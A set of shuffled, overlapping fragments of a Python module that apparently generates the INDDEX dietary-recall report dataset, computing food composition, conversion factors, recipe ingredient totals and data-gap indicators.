"__getattr__(self, name): if name in _INDICATORS_BY_SLUG: indicator = _INDICATORS_BY_SLUG[name] if indicator.is_calculated_later: if not",
"by the user and beneficiary during a recall session. The ingredients of the",
"already_reported_recipe_case_id and don't enumerate the ingredients again. We need to insert duplicates of",
"I('nsr_conv_method_desc_post_cooking', IN_UCR), I('nsr_conv_option_code_post_cooking', IN_UCR), I('nsr_conv_option_desc_post_cooking', IN_UCR), I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'),",
"row.set_fct_gap() row.enrichment_complete = True yield row def _recipe_rows(self, raw_recipe, raw_ingredients): recipe = FoodRow(raw_recipe,",
"row.set_fct_gap() self.fct_gap_code = FctGaps.NOT_AVAILABLE if self.food_type == FOOD_ITEM and self.fct_code: self.fct_gap_code = {",
"self.food_type in (FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code: self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code",
"= FoodCaseData({ 'domain': domain, 'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate), **{k: v for k, v",
"self.fct_code: self.fct_gap_code = { 'food_code': FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if self.is_recipe",
"self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis = not self.is_recipe self.measurement_amount = _maybe_float(self.measurement_amount) self.portions =",
"self.enrichment_complete: raise AttributeError(f\"{name} hasn't yet been set. It will be \" \"calculated outside",
"creation of a \"food\" case that's a child of this foodrecall. This dataset",
"and self.fct_code: self.fct_gap_code = { 'food_code': FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if",
"for {name}\") class FoodData: \"\"\"Generates the primary dataset for INDDEX reports. See file",
"This is the interface to this dataset, it glues together all the component",
"[ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ] class FoodRow: def __init__(self, ucr_row,",
"I('fct_reference_food_code_exists'), I('fct_data_used'), I('fct_code'), I('total_grams', CALCULATED_LATER), I('conv_factor_gap_code'), I('conv_factor_gap_desc'), I('fct_gap_code', CALCULATED_LATER), I('fct_gap_desc', CALCULATED_LATER), ] _INDICATORS_BY_SLUG",
"results in a \"foodrecall\" case. Every food they mention results in the creation",
"return False if gap_type == FctGaps.slug and row.fct_gap_code == FctGaps.AVAILABLE: return False food_types",
"[FoodRow(raw, self.fixtures) for raw in raw_ingredients] total_grams = _calculate_total_grams(recipe, ingredients) recipe.set_fct_gap(ingredients) recipe.recipe_name =",
"IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR), I('tag_9', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR),",
"__init__(self, ucr_row, fixtures, ingredient=None): self.uuid = uuid.uuid4() self.ucr_row = ucr_row self.fixtures = fixtures",
"_non_recipe_rows(self, rows): \"\"\"These rows aren't part of a recipe, or it wasn't found\"\"\"",
"'fao_who_gift_food_group_code', 'food_type'] FILTERABLE_COLUMNS = IN_MEMORY_FILTERS + FoodCaseData.FILTERABLE_COLUMNS def __init__(self, domain, *, datespan, filter_selections):",
"None raise AttributeError(f\"FoodRow has no definition for {name}\") class FoodData: \"\"\"Generates the primary",
"row.recipe_case_id = recipe.caseid if row.is_ingredient == 'yes': row.recipe_name = recipe.recipe_name if recipe.food_type ==",
"IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR), I('tag_9', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_9', IN_UCR), I('tag_10', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_10', IN_UCR),",
"self.fct_base_term_food_code_exists: self.fct_code = self.base_term_food_code self.fct_data_used = 'base_term_food_code' if self.fct_code: self.composition = fct[self.fct_code] self.fao_who_gift_food_group_code",
"self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code, self.conv_option_code)) if self.conv_factor_food_code: self.conv_factor_used = 'food_code'",
"user_es from corehq.apps.reports.filters.case_list import CaseListFilter as EMWF from corehq.apps.reports.standard.cases.utils import get_case_owners from custom.inddex.ucr_data",
"= bool(ingredient) if self._is_std_recipe_ingredient: self.food_code = ingredient.ingr_code self._set_ingredient_fields(ingredient) else: self.caseid = ucr_row['doc_id'] self.food_code",
"rows[row['doc_id']]['recipe'] = row elif row['recipe_case_id']: rows[row['recipe_case_id']]['ingredients'].append(row) else: # this isn't part of a",
"a recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values() def _get_all_rows(self): for group in self._get_grouped_rows(): master_recipe =",
"set, return that val return self.ucr_row[indicator.slug] if indicator.in_ucr else None raise AttributeError(f\"FoodRow has",
"I('base_term_food_code', IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time', IN_UCR, IS_RECALL_META), I('time_block', IN_UCR, IS_RECALL_META), I('already_reported_food',",
"self.fct_gap_code = FctGaps.AVAILABLE else: self.fct_gap_code = FctGaps.INGREDIENT_GAPS self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self): self.conv_factor_gap_code",
"rows[row['recipe_case_id']]['ingredients'].append(row) else: # this isn't part of a recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values() def",
"the recipe case setattr(row, col, getattr(recipe, col)) row.enrichment_complete = True yield row def",
"case. Every food they mention results in the creation of a \"food\" case",
"row.fao_who_gift_food_group_code not in food_groups: return False return True def _get_grouped_rows(self): \"\"\"Return raw case",
"for col in NSR_COLS_TO_COPY} amount = _maybe_float(raw_recipe['measurement_amount']) portions = _maybe_float(raw_recipe['portions']) amount_post_cooking = _maybe_float(master_recipe['nsr_measurement_amount_post_cooking'])",
"{ 'recipe': None, 'references': [], 'ingredients': [], }) for row in self._ucr.get_data(): if",
"IN_UCR), I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name', IN_UCR), I('is_ingredient', IN_UCR), I('ingredient_type', CALCULATED_LATER), I('recipe_case_id', IN_UCR),",
"group in self._get_grouped_rows(): master_recipe = group['recipe'] references = group['references'] ingredients = group['ingredients'] if",
"fct) self.fct_base_term_food_code_exists = bool(self.base_term_food_code and self.base_term_food_code in fct) self.fct_code = None if self.fct_food_code_exists:",
"NON_STANDARD_RECIPE) self.include_in_analysis = not self.is_recipe self.measurement_amount = _maybe_float(self.measurement_amount) self.portions = _maybe_float(self.portions) self.nsr_consumed_cooked_fraction =",
"self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self, nutrient_name): return _multiply(self.get_nutrient_per_100g(nutrient_name), self.total_grams, 0.01) def __getattr__(self, name): if name",
"_multiply(row.measurement_amount, row.conv_factor, row.portions) row.set_fct_gap() row.enrichment_complete = True yield row def _recipe_rows(self, raw_recipe, raw_ingredients):",
"I('include_in_analysis'), I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time', IN_UCR, IS_RECALL_META), I('time_block', IN_UCR, IS_RECALL_META), I('already_reported_food', IN_UCR), I('already_reported_food_case_id',",
"I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1',",
"= 'is_recall_meta' CALCULATED_LATER = 'calculated_later' class I: def __init__(self, slug, *tags): self.slug =",
"IN_UCR, IS_RECALL_META), I('age_months_calculated', IN_UCR, IS_RECALL_META), I('age_range', IS_RECALL_META), I('pregnant', IN_UCR, IS_RECALL_META), I('breastfeeding', IN_UCR, IS_RECALL_META),",
"self.ingr_recipe_code = ingredient.recipe_code self.ingr_fraction = ingredient.ingr_fraction def _set_composition(self): # Get the food composition",
"is not a valid filter slug\") self.fixtures = FixtureAccessor(domain) self._in_memory_filter_selections = { slug:",
"IN_UCR, IS_RECALL_META), I('food_code', IN_UCR), I('food_name', IN_UCR, IN_FOOD_FIXTURE), I('recipe_name', IN_UCR, CALCULATED_LATER), I('caseid'), I('food_type', IN_UCR,",
"amount * portions / amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction'] = None return {**raw_recipe, **nsr_cols} def",
"case subsequent references point to the recipe definition with already_reported_recipe_case_id and don't enumerate",
"True yield row def _recipe_rows(self, raw_recipe, raw_ingredients): recipe = FoodRow(raw_recipe, self.fixtures) if recipe.food_type",
"CALCULATED_LATER), I('caseid'), I('food_type', IN_UCR, IN_FOOD_FIXTURE), I('food_status', IN_UCR, IS_RECALL_META), I('reference_food_code'), I('base_term_food_code', IN_UCR), I('include_in_analysis'), I('fao_who_gift_food_group_code'),",
"self.reference_food_code: self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code) def set_fct_gap(self, ingredients=None): if ingredients: for",
"recipe case setattr(row, col, getattr(recipe, col)) row.enrichment_complete = True yield row def _insert_nsr_cols(raw_recipe,",
"from .fixtures import FixtureAccessor IN_UCR = 'in_ucr' IN_FOOD_FIXTURE = 'in_food_fixture' IS_RECALL_META = 'is_recall_meta'",
"Overview -------- Beneficiaries are asked about their diet in a \"recall\" session. This",
"CALCULATED_LATER), ] _INDICATORS_BY_SLUG = {i.slug: i for i in INDICATORS} NSR_COLS_TO_COPY = [",
"duplicates of the previously reported ingredients into the report for them. Components ----------",
"import defaultdict from functools import reduce from memoized import memoized from corehq.apps.es import",
"the food composition corresponding to food_code, fall back to base_term_food_code fct = self.fixtures.food_compositions",
"FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod def from_request(cls, domain, request): return cls( domain, datespan=request.datespan, filter_selections={'owner_id': cls._get_owner_ids(domain,",
"def _calculate_total_grams(recipe, ingredients): if recipe.food_type == STANDARD_RECIPE: res = {} recipe_total = _multiply(recipe.measurement_amount,",
"] class FoodRow: def __init__(self, ucr_row, fixtures, ingredient=None): self.uuid = uuid.uuid4() self.ucr_row =",
"I('nsr_conv_option_code_post_cooking', IN_UCR), I('nsr_conv_option_desc_post_cooking', IN_UCR), I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'),",
"in [amount, portions, amount_post_cooking]): nsr_cols['nsr_consumed_cooked_fraction'] = amount * portions / amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction']",
"It will be \" \"calculated outside the scope of FoodRow.\") return None if",
"= IN_FOOD_FIXTURE in tags self.is_recall_meta = IS_RECALL_META in tags self.is_calculated_later = CALCULATED_LATER in",
"self.conv_factor_food_code: self.conv_factor_used = 'food_code' self.conv_factor = self.conv_factor_food_code self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code: self.conv_factor_used",
"ingredients) @property @memoized def rows(self): rows = [] for row in self._get_all_rows(): if",
"< age_range.upper_bound: return age_range.name def get_nutrient_per_100g(self, nutrient_name): if self.fct_code: return self.composition.nutrients.get(nutrient_name) def get_nutrient_amt(self,",
") from .fixtures import FixtureAccessor IN_UCR = 'in_ucr' IN_FOOD_FIXTURE = 'in_food_fixture' IS_RECALL_META =",
"except TypeError: res[recipe.uuid] = None return res def _multiply(*args): try: return reduce(operator.mul, args)",
"INDICATORS} NSR_COLS_TO_COPY = [ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking', 'nsr_conv_option_code_post_cooking', 'nsr_conv_option_desc_post_cooking', 'nsr_measurement_amount_post_cooking', 'nsr_consumed_cooked_fraction', ] class FoodRow:",
"k in FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod def from_request(cls, domain, request): return cls( domain, datespan=request.datespan,",
"\"\"\"Return raw case rows grouped by recipe\"\"\" rows = defaultdict(lambda: { 'recipe': None,",
"reported ingredients into the report for them. Components ---------- FoodData :: This is",
"# nsr references are missing some values, insert them from the master recipe",
"FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self): self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE if (self.food_type == FOOD_ITEM and self._is_std_recipe_ingredient or",
"False if gap_type == FctGaps.slug and row.fct_gap_code == FctGaps.AVAILABLE: return False food_types =",
"self.fct_data_used = 'base_term_food_code' if self.fct_code: self.composition = fct[self.fct_code] self.fao_who_gift_food_group_code = self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description =",
"yield from self._recipe_rows(recipe, ingredients) @property @memoized def rows(self): rows = [] for row",
"auditing columns reporting on what data is or isn't available. Some of these",
"food they mention results in the creation of a \"food\" case that's a",
"'non_std_recipe_ingredient' for col in NSR_COLS_TO_COPY: # Copy these values from the recipe case",
"{ 'food_code': FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if self.is_recipe and ingredients: if",
"session. This results in a \"foodrecall\" case. Every food they mention results in",
"as a unified dataset. FoodRow :: Class responsible for row-wise calculations and indicator",
"get_case_owners from custom.inddex.ucr_data import FoodCaseData from .const import ( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE,",
"self.conv_factor_used = 'base_term_food_code' self.conv_factor = self.conv_factor_base_term_food_code self.conv_factor_gap_code = ConvFactorGaps.BASE_TERM self.conv_factor_gap_desc = ConvFactorGaps.DESCRIPTIONS[self.conv_factor_gap_code] @property",
"# If a gap type is specified, show only rows with gaps of",
"I('ingredient_type', CALCULATED_LATER), I('recipe_case_id', IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE),",
"None return res def _multiply(*args): try: return reduce(operator.mul, args) except TypeError: return None",
"Indicator descriptions can be found here: # https://docs.google.com/spreadsheets/d/1znPjfQSFEUFP_R_G8VYE-Bd5dg72k5sP-hZPuy-3RZo/edit INDICATORS = [ I('unique_respondent_id', IN_UCR,",
".get_ids()) return get_case_owners(request, domain, slugs) def _matches_in_memory_filters(self, row): # If a gap type",
"I('already_reported_food_case_id', IN_UCR), I('already_reported_recipe', IN_UCR), I('already_reported_recipe_case_id', IN_UCR), I('already_reported_recipe_name', IN_UCR), I('is_ingredient', IN_UCR), I('ingredient_type', CALCULATED_LATER), I('recipe_case_id',",
"I('fao_who_gift_food_group_code'), I('fao_who_gift_food_group_description'), I('user_food_group'), I('eating_time', IN_UCR, IS_RECALL_META), I('time_block', IN_UCR, IS_RECALL_META), I('already_reported_food', IN_UCR), I('already_reported_food_case_id', IN_UCR),",
"composition corresponding to food_code, fall back to base_term_food_code fct = self.fixtures.food_compositions self.fct_food_code_exists =",
"ingredients): self.fct_gap_code = FctGaps.AVAILABLE else: self.fct_gap_code = FctGaps.INGREDIENT_GAPS self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self):",
"memoized import memoized from corehq.apps.es import users as user_es from corehq.apps.reports.filters.case_list import CaseListFilter",
"= uuid.uuid4() self.ucr_row = ucr_row self.fixtures = fixtures self._is_std_recipe_ingredient = bool(ingredient) if self._is_std_recipe_ingredient:",
"STANDARD_RECIPE) and self.conv_method_code: self.conv_factor_food_code = self.fixtures.conversion_factors.get( (self.food_code, self.conv_method_code, self.conv_option_code)) self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get( (self.base_term_food_code,",
"= recipe_total for row in ingredients: res[row.uuid] = _multiply(recipe_total, row.ingr_fraction) return res else:",
"FctGaps.AVAILABLE else: self.fct_gap_code = FctGaps.INGREDIENT_GAPS self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self): self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE",
"import uuid from collections import defaultdict from functools import reduce from memoized import",
"if self._is_std_recipe_ingredient: self.is_ingredient = 'yes' self.ingr_recipe_code = ingredient.recipe_code self.ingr_fraction = ingredient.ingr_fraction def _set_composition(self):",
"_calculate_total_grams(recipe, ingredients): if recipe.food_type == STANDARD_RECIPE: res = {} recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor,",
"AttributeError(f\"FoodRow has no definition for {name}\") class FoodData: \"\"\"Generates the primary dataset for",
"it's an indicator in the UCR that hasn't been explicitly set, return that",
"k != 'owner_id'}} ) @staticmethod def _get_owner_ids(domain, request): slugs = request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs)",
"FoodRow: def __init__(self, ucr_row, fixtures, ingredient=None): self.uuid = uuid.uuid4() self.ucr_row = ucr_row self.fixtures",
"them. Components ---------- FoodData :: This is the interface to this dataset, it",
"total_grams[row.uuid] row.recipe_num_ingredients = len(ingredients) row.recipe_case_id = recipe.caseid if row.is_ingredient == 'yes': row.recipe_name =",
"self.is_recipe self.measurement_amount = _maybe_float(self.measurement_amount) self.portions = _maybe_float(self.portions) self.nsr_consumed_cooked_fraction = _maybe_float(self.nsr_consumed_cooked_fraction) self.enrichment_complete = False",
"[] for row in self._get_all_rows(): if self._matches_in_memory_filters(row): rows.append(row) return rows def _non_recipe_rows(self, rows):",
"in self._get_all_rows(): if self._matches_in_memory_filters(row): rows.append(row) return rows def _non_recipe_rows(self, rows): \"\"\"These rows aren't",
"self._is_std_recipe_ingredient: # If it's an indicator that hasn't been explicitly set, check if",
"= sum(res.values()) if res else None except TypeError: res[recipe.uuid] = None return res",
"the food fixture or from the parent food case's UCR if indicator.in_food_fixture: return",
"if recipe.food_type == STANDARD_RECIPE: res = {} recipe_total = _multiply(recipe.measurement_amount, recipe.conv_factor, recipe.portions) res[recipe.uuid]",
"= self._in_memory_filter_selections.get('gap_type') if gap_type == ConvFactorGaps.slug and row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE: return False if",
"if res else None except TypeError: res[recipe.uuid] = None return res def _multiply(*args):",
"rows): \"\"\"These rows aren't part of a recipe, or it wasn't found\"\"\" for",
"self.food_type == NON_STANDARD_RECIPE): self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE elif self.food_type in (FOOD_ITEM, STANDARD_RECIPE) and self.conv_method_code:",
"in filter_selections } self._ucr = FoodCaseData({ 'domain': domain, 'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate), **{k:",
"I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id', IN_UCR, IS_RECALL_META), I('opened_by_username', IN_UCR, IS_RECALL_META), I('owner_name',",
"indicator that hasn't been explicitly set, check if it can # be pulled",
"I('tag_7', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_7', IN_UCR), I('tag_8', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_8', IN_UCR), I('tag_9', IN_UCR, IN_FOOD_FIXTURE),",
"CALCULATED_LATER), I('recipe_case_id', IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1',",
"if self.conv_factor_food_code: self.conv_factor_used = 'food_code' self.conv_factor = self.conv_factor_food_code self.conv_factor_gap_code = ConvFactorGaps.AVAILABLE elif self.conv_factor_base_term_food_code:",
"I('already_reported_recipe_name', IN_UCR), I('is_ingredient', IN_UCR), I('ingredient_type', CALCULATED_LATER), I('recipe_case_id', IN_UCR), I('ingr_recipe_code'), I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name',",
"_INDICATORS_BY_SLUG = {i.slug: i for i in INDICATORS} NSR_COLS_TO_COPY = [ 'nsr_conv_method_code_post_cooking', 'nsr_conv_method_desc_post_cooking',",
"if self.food_type == FOOD_ITEM and self.fct_code: self.fct_gap_code = { 'food_code': FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM,",
"else: self.fct_gap_code = FctGaps.INGREDIENT_GAPS self.fct_gap_desc = FctGaps.DESCRIPTIONS[self.fct_gap_code] def _set_conversion_factors(self): self.conv_factor_gap_code = ConvFactorGaps.NOT_AVAILABLE if",
"for them. Components ---------- FoodData :: This is the interface to this dataset,",
"= amount * portions / amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction'] = None return {**raw_recipe, **nsr_cols}",
"I('ingr_fraction'), I('ingr_recipe_total_grams_consumed', CALCULATED_LATER), I('short_name', IN_UCR), I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR),",
"IN_UCR in tags self.in_food_fixture = IN_FOOD_FIXTURE in tags self.is_recall_meta = IS_RECALL_META in tags",
"== FctGaps.AVAILABLE for i in ingredients): self.fct_gap_code = FctGaps.AVAILABLE else: self.fct_gap_code = FctGaps.INGREDIENT_GAPS",
"if self._matches_in_memory_filters(row): rows.append(row) return rows def _non_recipe_rows(self, rows): \"\"\"These rows aren't part of",
"in fct) self.fct_base_term_food_code_exists = bool(self.base_term_food_code and self.base_term_food_code in fct) self.fct_code = None if",
"of a recipe, or it wasn't found\"\"\" for raw_row in rows: row =",
"in tags self.is_calculated_later = CALCULATED_LATER in tags # Indicator descriptions can be found",
"= 'calculated_later' class I: def __init__(self, slug, *tags): self.slug = slug tags =",
"and self.reference_food_code: self.fct_data_used = 'reference_food_code' self.fct_reference_food_code_exists = bool(self.reference_food_code) def set_fct_gap(self, ingredients=None): if ingredients:",
"for slug in self.IN_MEMORY_FILTERS if slug in filter_selections } self._ucr = FoodCaseData({ 'domain':",
"The ingredients of the recipe are entered as additional food cases and linked",
"IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id', IN_UCR, IS_RECALL_META), I('opened_by_username', IN_UCR, IS_RECALL_META), I('owner_name', IN_UCR, IS_RECALL_META),",
"= _multiply(recipe_total, row.ingr_fraction) return res else: # NON_STANDARD_RECIPE res = {} for row",
"from self._recipe_rows(recipe, ingredients) @property @memoized def rows(self): rows = [] for row in",
"= self._in_memory_filter_selections.get('fao_who_gift_food_group_code') if food_groups and row.fao_who_gift_food_group_code not in food_groups: return False return True",
"in cls.FILTERABLE_COLUMNS if k != 'owner_id'}} ) @staticmethod def _get_owner_ids(domain, request): slugs =",
"I('recipe_name', IN_UCR, CALCULATED_LATER), I('caseid'), I('food_type', IN_UCR, IN_FOOD_FIXTURE), I('food_status', IN_UCR, IS_RECALL_META), I('reference_food_code'), I('base_term_food_code', IN_UCR),",
"IN_FOOD_FIXTURE), I('other_tag_3', IN_UCR), I('tag_4', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_4', IN_UCR), I('tag_5', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_5', IN_UCR),",
"= FoodRow(raw_row, self.fixtures) row.total_grams = _multiply(row.measurement_amount, row.conv_factor, row.portions) row.set_fct_gap() row.enrichment_complete = True yield",
"in fct) self.fct_code = None if self.fct_food_code_exists: self.fct_code = self.food_code self.fct_data_used = 'food_code'",
"def _set_composition(self): # Get the food composition corresponding to food_code, fall back to",
"reduce from memoized import memoized from corehq.apps.es import users as user_es from corehq.apps.reports.filters.case_list",
"a \"recall\" session. This results in a \"foodrecall\" case. Every food they mention",
"res[row.uuid] = _multiply(recipe_total, row.ingr_fraction) return res else: # NON_STANDARD_RECIPE res = {} for",
"{ slug: filter_selections[slug] for slug in self.IN_MEMORY_FILTERS if slug in filter_selections } self._ucr",
"domain, slugs) def _matches_in_memory_filters(self, row): # If a gap type is specified, show",
"if not self.age_months_calculated: return None for age_range in AGE_RANGES: if age_range.lower_bound <= getattr(self,",
"= _INDICATORS_BY_SLUG[name] if indicator.is_calculated_later: if not self.enrichment_complete: raise AttributeError(f\"{name} hasn't yet been set.",
"self.in_ucr = IN_UCR in tags self.in_food_fixture = IN_FOOD_FIXTURE in tags self.is_recall_meta = IS_RECALL_META",
"_get_owner_ids(domain, request): slugs = request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs): return []",
"can # be pulled from the food fixture or from the parent food",
"information, and auditing columns reporting on what data is or isn't available. Some",
"else: # this isn't part of a recipe rows[row['doc_id']]['ingredients'].append(row) return rows.values() def _get_all_rows(self):",
"if (self.food_type == FOOD_ITEM and self._is_std_recipe_ingredient or self.food_type == NON_STANDARD_RECIPE): self.conv_factor_gap_code = ConvFactorGaps.NOT_APPLICABLE",
"ConvFactorGaps, FctGaps, ) from .fixtures import FixtureAccessor IN_UCR = 'in_ucr' IN_FOOD_FIXTURE = 'in_food_fixture'",
"with already_reported_recipe_case_id and don't enumerate the ingredients again. We need to insert duplicates",
"aren't part of a recipe, or it wasn't found\"\"\" for raw_row in rows:",
"raw_recipe, raw_ingredients): recipe = FoodRow(raw_recipe, self.fixtures) if recipe.food_type == STANDARD_RECIPE: # std recipe",
"These rows are associated with the recipe case, but don't have a case",
"self.fixtures = FixtureAccessor(domain) self._in_memory_filter_selections = { slug: filter_selections[slug] for slug in self.IN_MEMORY_FILTERS if",
"if slug not in self.FILTERABLE_COLUMNS: raise AssertionError(f\"{slug} is not a valid filter slug\")",
"IN_UCR), I('conv_units', IN_UCR), I('portions', IN_UCR), I('nsr_conv_method_code_post_cooking', IN_UCR), I('nsr_conv_method_desc_post_cooking', IN_UCR), I('nsr_conv_option_code_post_cooking', IN_UCR), I('nsr_conv_option_desc_post_cooking', IN_UCR),",
"inserted for each ingredient. These rows are associated with the recipe case, but",
"slug\") self.fixtures = FixtureAccessor(domain) self._in_memory_filter_selections = { slug: filter_selections[slug] for slug in self.IN_MEMORY_FILTERS",
"I('owner_name', IN_UCR, IS_RECALL_META), I('visit_date', IN_UCR, IS_RECALL_META), I('opened_on', IN_UCR, IS_RECALL_META), I('recall_status', IN_UCR, IS_RECALL_META), I('gender',",
"def _get_all_rows(self): for group in self._get_grouped_rows(): master_recipe = group['recipe'] references = group['references'] ingredients",
"during a recall session. The ingredients of the recipe are entered as additional",
"import ( AGE_RANGES, FOOD_ITEM, NON_STANDARD_RECIPE, STANDARD_RECIPE, ConvFactorGaps, FctGaps, ) from .fixtures import FixtureAccessor",
"= self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group = self.composition.user_defined_food_group self.reference_food_code = self.composition.reference_food_code_for_food_composition if self.fct_data_used",
"_INDICATORS_BY_SLUG: indicator = _INDICATORS_BY_SLUG[name] if indicator.is_calculated_later: if not self.enrichment_complete: raise AttributeError(f\"{name} hasn't yet",
"if k in FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod def from_request(cls, domain, request): return cls( domain,",
"= IN_UCR in tags self.in_food_fixture = IN_FOOD_FIXTURE in tags self.is_recall_meta = IS_RECALL_META in",
"all the component pieces and presents the result as a unified dataset. FoodRow",
"ingredients = [FoodRow(raw_recipe, self.fixtures, ingredient_data) for ingredient_data in self.fixtures.recipes[recipe.food_code]] else: # NON_STANDARD_RECIPE ingredients",
"for row in [recipe] + ingredients: row.total_grams = total_grams[row.uuid] row.recipe_num_ingredients = len(ingredients) row.recipe_case_id",
"self.fixtures.foods_by_name: self.base_term_food_code = self.fixtures.foods_by_name[self.food_base_term].food_code self._set_composition() self._set_conversion_factors() self.is_recipe = self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis",
"_multiply(row.measurement_amount, row.conv_factor, row.portions, recipe.nsr_consumed_cooked_fraction) try: res[recipe.uuid] = sum(res.values()) if res else None except",
"recipe ingredients come from the DB, NOT ingredient cases ingredients = [FoodRow(raw_recipe, self.fixtures,",
"= request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs) or EMWF.show_project_data(slugs): return [] # don't filter",
"a recall session. The ingredients of the recipe are entered as additional food",
"I('food_base_term', IN_UCR, IN_FOOD_FIXTURE), I('tag_1', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_1', IN_UCR), I('tag_2', IN_UCR, IN_FOOD_FIXTURE), I('other_tag_2', IN_UCR),",
"self.composition.fao_who_gift_food_group_code self.fao_who_gift_food_group_description = self.composition.fao_who_gift_food_group_description self.user_food_group = self.composition.user_defined_food_group self.reference_food_code = self.composition.reference_food_code_for_food_composition if self.fct_data_used ==",
"res else: # NON_STANDARD_RECIPE res = {} for row in ingredients: res[row.uuid] =",
"def __getattr__(self, name): if name in _INDICATORS_BY_SLUG: indicator = _INDICATORS_BY_SLUG[name] if indicator.is_calculated_later: if",
"if EMWF.show_deactivated_data(slugs): return (user_es.UserES() .show_only_inactive() .domain(domain) .get_ids()) return get_case_owners(request, domain, slugs) def _matches_in_memory_filters(self,",
"type gap_type = self._in_memory_filter_selections.get('gap_type') if gap_type == ConvFactorGaps.slug and row.conv_factor_gap_code == ConvFactorGaps.AVAILABLE: return",
"/ amount_post_cooking else: nsr_cols['nsr_consumed_cooked_fraction'] = None return {**raw_recipe, **nsr_cols} def _calculate_total_grams(recipe, ingredients): if",
